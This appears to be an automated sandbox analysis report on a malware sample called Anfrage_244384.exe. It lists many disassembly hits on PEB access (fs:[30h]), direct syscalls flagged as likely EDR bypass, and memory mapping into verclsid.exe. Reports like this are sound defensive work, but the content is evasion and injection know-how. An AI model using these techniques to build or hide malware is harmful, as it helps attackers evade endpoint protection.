Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C7190 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473D26B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473D26B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B1270 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B1270 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34699274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B256 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B256 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A724D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FD250 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745227 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7208 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7208 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B2F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B2F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F2F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347452E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346692FF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346792C5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346792C5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F2D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F2D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347072A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347072A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F92BC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F92BC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F92BC mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F92BC mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A329E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A329E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34713370 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F367 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D34C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D34C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745341 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669353 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669353 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F32A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667330 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473132D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473132D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347453FC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F3E6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B3D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A33A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A33A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346933A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474539D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C739A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C739A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681C60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A1C7C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FC4F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34741C3C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABC3B mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F9C32 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474BC01 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474BC01 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5CC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5CC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681CC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681CC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466DCA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34729D70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34729D70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677D75 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677D75 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABD4E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABD4E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667D41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: read write
